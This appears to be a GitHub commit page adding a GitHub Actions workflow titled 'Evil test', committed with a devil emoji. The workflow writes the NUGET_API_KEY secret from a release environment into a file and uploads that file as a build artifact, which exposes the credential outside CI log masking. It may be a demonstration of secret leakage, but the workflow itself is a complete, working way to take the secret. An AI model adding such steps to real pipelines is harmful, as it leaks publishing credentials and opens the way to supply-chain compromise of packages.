Skip to content

Commit d2855ba

Browse files
committed
😈
1 parent c82ac20 commit d2855ba

File tree

1 file changed

+18
-0
lines changed

1 file changed

+18
-0
lines changed
Lines changed: 18 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,18 @@
1+
name: Evil test
2+
on:
3+
push:
4+
workflow_dispatch:
5+
jobs:
6+
job1:
7+
runs-on: ubuntu-latest
8+
environment: public-release
9+
steps:
10+
- run: echo "TEST" >> output.txt
11+
- run: echo $TEST >> output.txt
12+
env:
13+
TEST: ${{secrets.NUGET_API_KEY}}
14+
- uses: actions/upload-artifact@v4
15+
with:
16+
name: Artifact
17+
if-no-files-found: error
18+
path: output.txt

0 commit comments

Comments
 (0)